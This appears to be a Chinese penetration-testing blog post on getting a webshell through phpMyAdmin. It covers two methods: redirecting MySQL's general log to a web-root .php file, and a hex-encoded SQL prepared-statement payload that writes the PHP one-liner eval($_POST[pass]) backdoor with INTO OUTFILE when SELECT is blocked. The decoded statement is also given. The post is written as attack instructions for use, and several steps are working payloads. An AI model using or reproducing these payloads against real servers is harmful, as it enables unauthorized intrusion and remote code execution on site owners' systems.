PhpMyAdmin花式getshell
in PENETRATION with 0 comment

PhpMyAdmin花式getshell

in PENETRATION with 0 comment

利用日志获取webshell

必须是root权限

  1. 修改general log 为 on
    变量.jpg

logfile.jpg

  1. 修改general log file 文件路径为web的所在的路径,后缀改为php,使它可以以php的方式被解析。
    logfilepath.jpg
  2. 然后设法在日志文件中包含php脚本,一般情况下日志文件不会过滤特殊字符。
    sql.jpg
  3. 访问你设置的logfile路径,日志文件会以php方式解析。
    shell.jpg

利用phpmyadmin文件本地包含漏洞获取webshell

root权限有waf的情况下获取webshell

详情可以参考: https://bbs.ichunqiu.com/thread-19035-1-1.html这篇文章写得比较详细。

常规方式获取webshell

  1. 前提,需要root权限。
  2. 需要知道网站的绝对路径
  3. 需要目录具有可写权限

需要注意的一点,有时候root权限不能执行select操作的时候,也可以使用不使用select语句的方式获取webshell

当select被禁用的时候:
执行

SET @SQLString = 
0x73656C65637420273C3F70687020406576616C28245F504F53545B706173735D293B3F3E27494E544F204F555446494C45

PREPARE test FROM @SQLString;

EXECUTE test;

这一串东西就是 select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘C:/wwwroot/4/install_package/1111111.php’
的十六进制形式 参考老锥博客https://www.bodkin.ren/?p=461
关于十六进制转换有好多方式,最简单的就是你的firefox的hackbar看见没,看见了吧哈哈

关于其他什么建表create的都大同小异,这一方式是罪最简单最实用的。

关于一些phpmyadmin的漏洞

Responses